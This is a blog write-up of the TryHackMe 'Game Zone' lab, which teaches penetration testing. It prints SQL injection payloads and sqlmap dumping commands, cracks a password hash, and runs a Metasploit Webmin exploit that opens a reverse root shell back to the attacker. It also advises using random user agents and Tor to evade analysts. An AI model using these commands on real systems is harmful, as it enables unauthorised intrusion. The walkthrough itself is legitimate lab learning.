<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>TryHackMe writeup: Game Zone</title><style>
      * {
        font-family: Georgia, Cambria, "Times New Roman", Times, serif;
      }
      html, body {
        margin: 0;
        padding: 0;
      }
      h1 {
        font-size: 50px;
        margin-bottom: 17px;
        color: #333;
      }
      h2 {
        font-size: 24px;
        line-height: 1.6;
        margin: 30px 0 0 0;
        margin-bottom: 18px;
        margin-top: 33px;
        color: #333;
      }
      h3 {
        font-size: 30px;
        margin: 10px 0 20px 0;
        color: #333;
      }
      header {
        width: 640px;
        margin: auto;
      }
      section {
        width: 640px;
        margin: auto;
      }
      section p {
        margin-bottom: 27px;
        font-size: 20px;
        line-height: 1.6;
        color: #333;
      }
      section img {
        max-width: 640px;
      }
      footer {
        padding: 0 20px;
        margin: 50px 0;
        text-align: center;
        font-size: 12px;
      }
      .aspectRatioPlaceholder {
        max-width: auto !important;
        max-height: auto !important;
      }
      .aspectRatioPlaceholder-fill {
        padding-bottom: 0 !important;
      }
      header,
      section[data-field=subtitle],
      section[data-field=description] {
        display: none;
      }
      </style></head><body><article class="h-entry">
<header>
<h1 class="p-name">TryHackMe writeup: Game Zone</h1>
</header>
<section data-field="subtitle" class="p-summary">
This is a room by TryHackMe which discussess an simple, but nonetheless interesting, means of privilege escalation.
</section>
<section data-field="body" class="e-content">
<section name="f168" class="section section--body section--first section--last"><div class="section-divider"><hr class="section-divider"></div><div class="section-content"><div class="section-inner sectionLayout--insetColumn"><h3 name="17ee" id="17ee" class="graf graf--h3 graf--leading graf--title">TryHackMe writeup: Game Zone</h3><p name="7415" id="7415" class="graf graf--p graf-after--h3">Game Zone is a TryHackMe room that aims to teach its user “how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root” (<a href="https://tryhackme.com/room/gamezone" data-href="https://tryhackme.com/room/gamezone" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">“tryhackme”, 2019</a>). This room started out as fairly standard, but then showed itself to teach interesting things in the privilege escalation state. In this article, I will discuss my experience working out the solution to this room.</p><figure name="0d06" id="0d06" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*8OJCMStl3PV2Jzbfptsv1A.png" data-width="1300" data-height="807" data-is-featured="true" src="https://cdn-images-1.medium.com/max/800/1*8OJCMStl3PV2Jzbfptsv1A.png"><figcaption class="imageCaption">Base Image: <a href="https://tvtropes.org/pmwiki/pmwiki.php/Main/SmallGirlBigGun" data-href="https://tvtropes.org/pmwiki/pmwiki.php/Main/SmallGirlBigGun" class="markup--anchor markup--figure-anchor" rel="noopener" target="_blank">TV Tropes (n.d.).</a></figcaption></figure><h3 name="66c5" id="66c5" class="graf graf--h3 graf-after--figure">Procedure</h3><p name="86b7" id="86b7" class="graf graf--p graf-after--h3">Before proceeding, it is important to define the objectives of this room. This is a walkthrough room, so it was made in order for the contestant to learn a new skill by following the prompts. The primary objectives, however, are to obtain the user flag and the root flag.</p><h4 name="2b3c" id="2b3c" class="graf graf--h4 graf-after--p">Initial probing</h4><p name="61b3" id="61b3" class="graf graf--p graf-after--h4">As with these TryHackMe boot2root machines, I clicked on the green-coloured “start machine” button on the top-right corner of the first task to boot up the target virtual machine. After about five minutes, I proceeded to probe the system. The target machine is running a web server with a banner depicting a cartoon bloke holding a sniper (Fig. 1):</p><figure name="e388" id="e388" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*CdUD7kcLAOHV21BcjKtTkg.png" data-width="831" data-height="516" src="https://cdn-images-1.medium.com/max/800/1*CdUD7kcLAOHV21BcjKtTkg.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 1: The target machine’s website.</strong></figcaption></figure><p name="94c5" id="94c5" class="graf graf--p graf-after--figure">The name of the sniper-wielding bloke can be discovered via Google’s reverse image search feature and gaining an understanding of the media that it came from by parsing the results.</p><h4 name="639e" id="639e" class="graf graf--h4 graf-after--p">Exploitation</h4><p name="3366" id="3366" class="graf graf--p graf-after--h4">To proceed to gain initial access to the machine, I will exploit an SQL injection flaw in the web application system to extract from the system. I will run the community edition of Burp Suite (<a href="https://portswigger.net/burp/communitydownload" data-href="https://portswigger.net/burp/communitydownload" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">PortSwigger, n.d.</a>), as shown in Fig. 2:</p><figure name="b25b" id="b25b" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*cpWFojBAEYDwkVvgRarmWQ.png" data-width="914" data-height="482" src="https://cdn-images-1.medium.com/max/800/1*cpWFojBAEYDwkVvgRarmWQ.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 2: Burp Suite panel.</strong></figcaption></figure><p name="0de5" id="0de5" class="graf graf--p graf-after--figure">I opened up the browser (Fig. 2a) and turned off the intercept function (Fig. 2b). Then, I “got the ball rolling” by inserting the string <code class="markup--code markup--p-code">&#39; or 1=1-- -</code> into the “log in” field (Fig. 1a) and a random string into the “password” field (Fig. 1b). Doing so logged me in with the necessary credentials and redirected myself onto the <code class="markup--code markup--p-code">/portal.php</code> webpage (Fig. 3):</p><figure name="f519" id="f519" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*gPtx3t-rSH2jX0Tpq5w0Ww.png" data-width="654" data-height="312" src="https://cdn-images-1.medium.com/max/800/1*gPtx3t-rSH2jX0Tpq5w0Ww.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 3: The </strong><code class="markup--code markup--figure-code">/portal.php</code><strong class="markup--strong markup--figure-strong"> redirect page.</strong></figcaption></figure><p name="1508" id="1508" class="graf graf--p graf-after--figure">It is likely that the textbox (Fig. 3a) is vulnerable to an SQL injection. To test this hypothesis, I will insert a random string (<code class="markup--code markup--p-code">dna deniers</code> in my case) into it and then click on the “search” button (Fig. 3b). Burp Suite intercepts these requests made by its built-in Google Chrome browser despite the “intercept” button being set to off (Fig. 2b). These requests can be accessed through the proxy’s HTTP history pane (Fig. 2c) and then forwarded the POST request onto the repeater (Fig. 4):</p><figure name="3aa6" id="3aa6" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*tDC9zHYFdFyjCuLtuqWitg.png" data-width="1057" data-height="776" src="https://cdn-images-1.medium.com/max/800/1*tDC9zHYFdFyjCuLtuqWitg.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 4: The POST request with the potential SQL Injection vector.</strong></figcaption></figure><p name="08a5" id="08a5" class="graf graf--p graf-after--figure">I saved the contents of the raw (Fig. 4b) request’s text field (Fig. 4a) into a text document. The request can be passed off to a tool called <a href="https://sqlmap.org/" data-href="https://sqlmap.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">sqlmap (n.d.)</a>, a tool that automates the process of exploiting SQL injection vulnerability vectors. To do this, I started up a terminal on my AttackBox, changed directories to my Game Zone project files and started <code class="markup--code markup--p-code">sqlmap</code> with the following parameters:</p><pre name="dd29" id="dd29" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ sqlmap --random-agent -r requests.txt --dbms=mysql --dump</strong></pre><p name="e869" id="e869" class="graf graf--p graf-after--pre">The <code class="markup--code markup--p-code">-r</code> flag specifies that request text file that I saved a moment ago, the <code class="markup--code markup--p-code">--dbms</code> flag specifies the database management system (MySQL in this case) that the target system is running and the <code class="markup--code markup--p-code">--dump</code> flag instructs <code class="markup--code markup--p-code">sqlmap</code> to dump the entire database.</p><p name="84ed" id="84ed" class="graf graf--p graf-after--p">Finally, the <code class="markup--code markup--p-code">--random-agent</code> flag instruct <code class="markup--code markup--p-code">sqlmap</code> to use random browser user agent strings, which can confuse any systems administrators or security analysts that are on the lookout for hackers. <strong class="markup--strong markup--p-strong">Protip: </strong>in<strong class="markup--strong markup--p-strong"> </strong>a real world red teaming engagement, the <code class="markup--code markup--p-code">--tor</code> flag can be used to tunnel <code class="markup--code markup--p-code">sqlmap</code> requests and network traffic through the Tor Anonymity software (<a href="https://www.torproject.org/" data-href="https://www.torproject.org/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Tor Project, n.d.</a>), which can further baffle any system administrators or security analysts.</p><p name="efc0" id="efc0" class="graf graf--p graf-after--p"><code class="markup--code markup--p-code">sqlmap</code> reported the following information regarding the kinds of SQL injection that has been identified:</p><pre name="6c5f" id="6c5f" class="graf graf--pre graf-after--p">sqlmap identified the following injection point(s) with a total of 90 HTTP(s) requests:<br>---<br>Parameter: searchitem (POST)<br>  Type: boolean-based blind<br>    Title: OR boolean-based blind — WHERE or HAVING clause (MySQL comment)<br>    Payload: searchitem=-2335&#39; OR 7043=7043#</pre><pre name="5c29" id="5c29" class="graf graf--pre graf-after--pre">  Type: error-based<br>    Title: MySQL &gt;= 5.6 AND error-based -- WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br>    Payload: searchitem=dna deniers&#39; AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(7775=7775,1))),0x71786a7871),7775)-- aOTf</pre><pre name="9d89" id="9d89" class="graf graf--pre graf-after--pre">  Type: time-based blind<br>    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br>    Payload: searchitem=dna deniers&#39; AND (SELECT 1312 FROM (SELECT(SLEEP(5)))EjBJ)-- fvCO</pre><pre name="710c" id="710c" class="graf graf--pre graf-after--pre">  Type: UNION query<br>    Title: MySQL UNION query (NULL) -- 3 columns<br>    Payload: searchitem=dna deniers’ UNION ALL SELECT NULL,CONCAT(0x716b627171,0x6a41586165704d534f575655686848776e59524f666c767767504672656e4c50695148467942434e,0x71786a7871),NULL#<br>---</pre><p name="856f" id="856f" class="graf graf--p graf-after--pre">The input text box is vulnerable to four different kinds of SQL injection: a UNION-query based SQL injection, a boolean-based blind SQL injection, an error-based SQL injection and a time-based blind SQL injection. I will not be discussing the technical aspects of these injections, but for anyone interested in a comprehensive treatment, I recommend the book <em class="markup--em markup--p-em">SQL Injection Attacks and Defense </em>(<a href="https://isbnsearch.org/isbn/9781597499637" data-href="https://isbnsearch.org/isbn/9781597499637" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Clarke, 2012</a>).</p><p name="c655" id="c655" class="graf graf--p graf-after--p">After <code class="markup--code markup--p-code">sqlmap</code> finished dumping the MySQL instance from the target machine, I examined the tables that it dumped. I noticed two tables, the <code class="markup--code markup--p-code">post</code> table and the <code class="markup--code markup--p-code">user</code> table. The <code class="markup--code markup--p-code">post</code> table just contains video game titles and descriptions of them. The <code class="markup--code markup--p-code">user</code> table (Fig. 5) has a lot more useful information: both the <code class="markup--code markup--p-code">username</code> and <code class="markup--code markup--p-code">pwd</code> field — the second field being a hashed password of its respective username.</p><figure name="7c30" id="7c30" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*NqnV745QadtF95Vb8j4SbA.png" data-width="1065" data-height="274" src="https://cdn-images-1.medium.com/max/800/1*NqnV745QadtF95Vb8j4SbA.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 5: formatted table of the</strong> <code class="markup--code markup--figure-code">user</code> <strong class="markup--strong markup--figure-strong">table dump.</strong></figcaption></figure><p name="f562" id="f562" class="graf graf--p graf-after--figure">Note that there is only one row in the table depicted by Fig. 5. I have split the full hash into two rows so that the table can be easier to read. The username is <code class="markup--code markup--p-code">agent47</code> and the full hashed password is:</p><pre name="3e3c" id="3e3c" class="graf graf--pre graf-after--p">ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14</pre><p name="0835" id="0835" class="graf graf--p graf-after--pre">With a username and hashed password at hand, I can now proceed to crack the hash with John the Ripper (<a href="https://www.openwall.com/john/" data-href="https://www.openwall.com/john/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">OpenWall, n.d.</a>). On my AttackBox, I stored the hash into a text file:</p><pre name="6cb7" id="6cb7" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ touch hash.txt</strong><br> <br><strong class="markup--strong markup--pre-strong">└─$ echo &quot;ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14&quot; &gt;&gt; hash.txt</strong><br><br><strong class="markup--strong markup--pre-strong">└─$ cat hash.txt </strong><br>ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14</pre><p name="97b0" id="97b0" class="graf graf--p graf-after--pre">Before I can crack the hash, I need to know what kind of hash that it is. I used the <a href="https://hashes.com/en/tools/hash_identifier" data-href="https://hashes.com/en/tools/hash_identifier" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Hash Type Identifier (n.d.)</a> to work out that this hash was generated with the SHA-256 algorithm. Knowing the kind of hash that I am dealing with, I can proceed to instruct John the Ripper to crack the password:</p><pre name="70c9" id="70c9" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ john hash.txt --wordlist=./rockyou.txt --format=Raw-SHA256</strong><br>[... snip ...]<br>Using default input encoding: UTF-8<br>Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])<br>Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status<br><strong class="markup--strong markup--pre-strong"><em class="markup--em markup--pre-em">videogamer124 (?) </em></strong><br>1g 0:00:00:00 DONE (redacted) 1.694g/s 4900Kp/s 4900Kc/s 4900KC/s vidhus..vidamexicana<br>Use the &quot;--show --format=Raw-SHA256&quot; options to display all of the cracked passwords reliably<br>Session completed.</pre><p name="f614" id="f614" class="graf graf--p graf-after--pre">Armed with the username-password combination <code class="markup--code markup--p-code">agent47:videogamer124</code>, I can now test the notion that “agent47” is reusing login credentials. I initiated an SSH connection to the target machine and attempted to log in to the system with the aforementioned username and password combination:</p><pre name="8774" id="8774" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ssh agent47@&lt;boot2root ip&gt;</strong><br>The authenticity of host &#39;&lt;boot2root ip&gt; (&lt;boot2root ip&gt;)&#39; can&#39;t be established.<br>ED25519 key fingerprint is SHA256:CyJgMM67uFKDbNbKyUM0DexcI+LWun63SGLfBvqQcLA.<br>This key is not known by any other names<br>Are you sure you want to continue connecting (yes/no/[fingerprint])? <strong class="markup--strong markup--pre-strong">[yes]</strong><br>Warning: Permanently added &#39;&lt;boot2root ip&gt;&#39; (ED25519) to the list of known hosts.<br>agent47@&lt;boot2root ip&gt;&#39;s password: <strong class="markup--strong markup--pre-strong">[videogamer124]</strong><br>Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0–159-generic x86_64)</pre><pre name="311a" id="311a" class="graf graf--pre graf-after--pre"> * Documentation: https://help.ubuntu.com<br> * Management: https://landscape.canonical.com<br> * Support: https://ubuntu.com/advantage</pre><pre name="94fa" id="94fa" class="graf graf--pre graf-after--pre">109 packages can be updated.<br>68 updates are security updates.</pre><pre name="9773" id="9773" class="graf graf--pre graf-after--pre">Last login: [redacted] from [redacted]<br><strong class="markup--strong markup--pre-strong">agent47@gamezone:~$</strong></pre><p name="cc7d" id="cc7d" class="graf graf--p graf-after--pre">I now have a means by which to interact with the system — at least with the permissions granted to <code class="markup--code markup--p-code">agent47</code>.</p><h4 name="5c76" id="5c76" class="graf graf--h4 graf-after--p">Post exploitation</h4><p name="8928" id="8928" class="graf graf--p graf-after--h4">I will start by dumping the user flag:</p><pre name="cae0" id="cae0" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">agent47@gamezone:~$ ls</strong><br>user.txt<br><strong class="markup--strong markup--pre-strong">agent47@gamezone:~$ cat user.txt<br></strong>[redacted]</pre><p name="a3f1" id="a3f1" class="graf graf--p graf-after--pre">This is a good start. But, there is also a root flag on the system. To obtain the root flag, the lab suggests using a reverse SSH tunnel (<a href="https://goteleport.com/blog/ssh-tunneling-explained/" data-href="https://goteleport.com/blog/ssh-tunneling-explained/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Shah, 2021</a>) to forward a local port on the AttackBox to a local service running on the target machine that is configured to run on the local loopback or is behind some firewall.</p><p name="8d41" id="8d41" class="graf graf--p graf-after--p">I will start by using the <code class="markup--code markup--p-code">ss</code> utility on the target system to enumerate the running services on itself:</p><pre name="d90b" id="d90b" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">agent47@gamezone:~$ ss -t -u -l -p -n</strong><br>Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port <br>udp   UNCONN 0      0      *:10000            *:* <br>udp   UNCONN 0      0      *:68               *:* <br>tcp   LISTEN 0      80     127.0.0.1:3306     *:* <br>tcp   LISTEN 0      128    *:10000            *:* <br>tcp   LISTEN 0      128    *:22               *:* <br>tcp   LISTEN 0      128    :::80              :::* <br>tcp   LISTEN 0      128    :::22              :::*</pre><p name="702f" id="702f" class="graf graf--p graf-after--pre">The <code class="markup--code markup--p-code">-t</code> flag displays all TCP sockets, the <code class="markup--code markup--p-code">-u</code> flag does the same for UDP sockets, the <code class="markup--code markup--p-code">-l</code> flag lists listening sockets, the <code class="markup--code markup--p-code">-p</code> flag lists the processes using the socket and the <code class="markup--code markup--p-code">-n</code> flag assures that services names are not resolved.</p><p name="1d29" id="1d29" class="graf graf--p graf-after--p">The port 10000 is typically associated with web-based system administration tools. So, I will now configure my AttackBox to establish an SSH tunnel that will listen on the local port 4444 and redirect the traffic from it to the 10000 port on the target machine:</p><pre name="ae4f" id="ae4f" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ ssh -N -L 4444:127.0.0.1:10000 agent47@&lt;boot2root ip&gt;</strong><br>agent47@&lt;boot2root ip&gt;&#39;s password: <strong class="markup--strong markup--pre-strong">[videogamer124]<br></strong>[... listening ...]</pre><p name="a8fb" id="a8fb" class="graf graf--p graf-after--pre">The <code class="markup--code markup--p-code">-L</code> flag tells the <code class="markup--code markup--p-code">ssh</code> utility to set up an SSH reverse tunnel to be listened on port 4444 and redirect the traffic to port 10000 of the target machine, and the <code class="markup--code markup--p-code">-N</code> flag tells the ssh utility not to execute any commands.</p><p name="1bfb" id="1bfb" class="graf graf--p graf-after--p">With the SSH reverse tunnel set up, I can now access the hypothesised web administration tool via <code class="markup--code markup--p-code">127.0.0.1:4444</code> on my web browser. I am presented with the <a href="https://www.webmin.com/" data-href="https://www.webmin.com/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Webmin (n.d.)</a> panel (Fig. 6):</p><figure name="af66" id="af66" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*ukbEGdu6ltCpsR5rTAMqxw.png" data-width="604" data-height="234" src="https://cdn-images-1.medium.com/max/800/1*ukbEGdu6ltCpsR5rTAMqxw.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 6: The Webmin Panel.</strong></figcaption></figure><p name="4bda" id="4bda" class="graf graf--p graf-after--figure">I will login with the <code class="markup--code markup--p-code">agent47:videogamer124</code> username and password combination, and…</p><figure name="d2a1" id="d2a1" class="graf graf--figure graf-after--p"><img class="graf-image" data-image-id="1*vqdKEwDXJptehNd_Vmka5Q.png" data-width="825" data-height="497" src="https://cdn-images-1.medium.com/max/800/1*vqdKEwDXJptehNd_Vmka5Q.png"><figcaption class="imageCaption"><strong class="markup--strong markup--figure-strong">Figure 7: After logging into the Webmin panel.</strong></figcaption></figure><p name="3c38" id="3c38" class="graf graf--p graf-after--figure">This version of Webmin is <code class="markup--code markup--p-code">1.580</code> (Fig. 7a), which is susceptible to a remote command execution exploit that can be leveraged for privilege escalation purposes. I shall configure the exploit on the AttackBox:</p><pre name="7f17" id="7f17" class="graf graf--pre graf-after--p"><strong class="markup--strong markup--pre-strong">└─$ sudo msfconsole </strong></pre><pre name="5352" id="5352" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="a49c" id="a49c" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 &gt; use exploit/unix/webapp/webmin_show_cgi_exec</strong><br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set PAYLOAD payload/cmd/unix/reverse</strong><br>PAYLOAD =&gt; cmd/unix/reverse<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set USERNAME agent47</strong><br>USERNAME =&gt; agent47<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set PASSWORD videogamer124</strong><br>PASSWORD =&gt; videogamer124<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set RHOSTS 127.0.0.1</strong><br>RHOSTS =&gt; 127.0.0.1<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set RPORT 4444<br>RPORT =&gt; 4444</strong></pre><pre name="2482" id="2482" class="graf graf--pre graf-after--pre">[... snip ...]</pre><pre name="04c8" id="04c8" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set LHOST &lt;attackbox ip&gt;</strong><br>LHOST =&gt; &lt;attackbox ip&gt;<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set LPORT 4446</strong><br>LPORT =&gt; 4446<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; set SSL false</strong><br>[!] Changing the SSL option’s value may require changing RPORT!<br>SSL =&gt; false<br><strong class="markup--strong markup--pre-strong">msf6 exploit(unix/webapp/webmin_show_cgi_exec) &gt; exploit</strong></pre><pre name="6431" id="6431" class="graf graf--pre graf-after--pre">[*] Started reverse TCP double handler on &lt;attackbox ip&gt;:4446 <br>[*] Attempting to login…<br>[+] Authentication successful<br>[+] Authentication successful<br>[*] Attempting to execute the payload…<br>[*] Accepted the first client connection…<br>[*] Accepted the second client connection…<br>[+] Payload executed successfully<br>[*] Command: echo za1W8NUh1pucbcDG;<br>[*] Writing to socket A<br>[*] Writing to socket B<br>[*] Reading from sockets…<br>[*] Reading from socket A<br>[*] A: &quot;za1W8NUh1pucbcDG\r\n&quot;<br>[*] Matching...<br>[*] B is input...<br>[*] Command shell session 1 opened (&lt;attackbox ip&gt;:4446 -&gt; &lt;boot2root ip&gt;:34436 ) at [redacted] -0400</pre><pre name="7a6b" id="7a6b" class="graf graf--pre graf-after--pre"><strong class="markup--strong markup--pre-strong">id</strong><br>uid=0(root) gid=0(root) groups=0(root)<br><strong class="markup--strong markup--pre-strong">cat /root/root.txt<br></strong>[redacted]</pre><p name="0b24" id="0b24" class="graf graf--p graf-after--pre">Allora.</p><h3 name="2b84" id="2b84" class="graf graf--h3 graf-after--p">Conclusion</h3><p name="8d78" id="8d78" class="graf graf--p graf-after--h3">This was a room that discussed fairly standard vulnerabilities regarding the public-facing web application. In my opinion, the most interesting part was opening a reverse tunnel to the target system to access the local <a href="https://www.webmin.com/" data-href="https://www.webmin.com/" class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">Webmin (n.d.)</a> panel for privilege escalation purposes.</p><h4 name="4459" id="4459" class="graf graf--h4 graf-after--p">Takeaways</h4><ul class="postList"><li name="cbe9" id="cbe9" class="graf graf--li graf-after--h4">As demonstrated in this and other TryHackMe rooms, reverse Google image searches paired with a keen eye can reveal background details regarding pictures.</li><li name="6b29" id="6b29" class="graf graf--li graf-after--li">Password cracking might be a bit lame, but should not be overlooked, as it can lead to credential stuffing.</li><li name="5227" id="5227" class="graf graf--li graf-after--li">A reverse SSH tunnel can be created to access local services on the target system like the following:</li></ul><pre name="3214" id="3214" class="graf graf--pre graf-after--li"><strong class="markup--strong markup--pre-strong">$ ssh -N -L [attacker port]:127.0.0.1:[target port] &lt;user@target ip&gt;</strong></pre><h4 name="b550" id="b550" class="graf graf--h4 graf-after--pre">Plug</h4><p name="052e" id="052e" class="graf graf--p graf-after--h4">Check out my friend Mira Lazine who, along with other associates, needs financial and emotional help. Check out the following links:</p><ul class="postList"><li name="ef0c" id="ef0c" class="graf graf--li graf-after--p">Her Twitter profile: <a href="https://twitter.com/MiraLazine" data-href="https://twitter.com/MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://twitter.com/MiraLazine</a></li><li name="4396" id="4396" class="graf graf--li graf-after--li">Her Medium profile: <a href="https://medium.com/@MiraLazine" data-href="https://medium.com/@MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener" target="_blank">https://medium.com/@MiraLazine</a></li><li name="7665" id="7665" class="graf graf--li graf-after--li">Donate to herself on Cash.App: <a href="https://cash.app/$MiraLazine" data-href="https://cash.app/$MiraLazine" class="markup--anchor markup--li-anchor" rel="noopener ugc nofollow noopener" target="_blank">https://cash.app/$MiraLazine</a></li></ul><h3 name="3ca8" id="3ca8" class="graf graf--h3 graf-after--li">References</h3><p name="a9bb" id="a9bb" class="graf graf--p graf-after--h3">Clarke, J. (2012). <em class="markup--em markup--p-em">SQL Injection Attacks and Defense [Second Edition]</em>. Syngress.</p><p name="bebb" id="bebb" class="graf graf--p graf-after--p">Hash Type Identifier (n.d.). Retrieved on Apr. 1, 2022 from: <a href="https://hashes.com/en/tools/hash_identifier" data-href="https://hashes.com/en/tools/hash_identifier" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://hashes.com/en/tools/hash_identifier</a></p><p name="0b21" id="0b21" class="graf graf--p graf-after--p">OpenWall (n.d.). <em class="markup--em markup--p-em">John the Ripper password cracker</em>. Retrieved on Apr. 1, 2022 from: <a href="https://www.openwall.com/john/" data-href="https://www.openwall.com/john/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.openwall.com/john/</a></p><p name="1996" id="1996" class="graf graf--p graf-after--p">PortSwigger (n.d.). <em class="markup--em markup--p-em">Burp Suite Community Edition</em>. Retrieved on Apr. 2, 2022 from: <a href="https://portswigger.net/burp/communitydownload" data-href="https://portswigger.net/burp/communitydownload" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://portswigger.net/burp/communitydownload</a></p><p name="c545" id="c545" class="graf graf--p graf-after--p">Shah, S. (2021). <em class="markup--em markup--p-em">SSH Tunneling Explained</em>. Teleport Blog. Retrieved on Apr. 1, 2022 from: <a href="https://goteleport.com/blog/ssh-tunneling-explained/" data-href="https://goteleport.com/blog/ssh-tunneling-explained/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://goteleport.com/blog/ssh-tunneling-explained/</a></p><p name="a838" id="a838" class="graf graf--p graf-after--p">sqlmap (n.d.). <em class="markup--em markup--p-em">Automatic SQL injection and database takeover tool</em>. Retrieved on Apr. 1, 2022 from: <a href="https://sqlmap.org/" data-href="https://sqlmap.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://sqlmap.org/</a></p><p name="e9c2" id="e9c2" class="graf graf--p graf-after--p">Tor Project (n.d.). Retrieved on Apr. 2, 2022 from: <a href="https://www.torproject.org/" data-href="https://www.torproject.org/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.torproject.org/</a></p><p name="7041" id="7041" class="graf graf--p graf--startsWithDoubleQuote graf-after--p">“tryhackme” (2019). <em class="markup--em markup--p-em">Game Zone</em>. Retrieved on Apr. 2, 2022 from: <a href="https://tryhackme.com/room/gamezone" data-href="https://tryhackme.com/room/gamezone" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tryhackme.com/room/gamezone</a></p><p name="0e73" id="0e73" class="graf graf--p graf-after--p">TV Tropes (n.d.). <em class="markup--em markup--p-em">Small Girl, Big Gun</em>. Retrieved on Apr. 2, 2022 from: <a href="https://tvtropes.org/pmwiki/pmwiki.php/Main/SmallGirlBigGun" data-href="https://tvtropes.org/pmwiki/pmwiki.php/Main/SmallGirlBigGun" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tvtropes.org/pmwiki/pmwiki.php/Main/SmallGirlBigGun</a></p><p name="384a" id="384a" class="graf graf--p graf-after--p graf--trailing">Webmin (n.d.). Retrieved on Apr. 1, 2022 from: <a href="https://www.webmin.com/" data-href="https://www.webmin.com/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.webmin.com/</a></p></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/190da0b68433"><time class="dt-published" datetime="2022-04-04T12:58:33.550Z">April 4, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-game-zone-190da0b68433" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>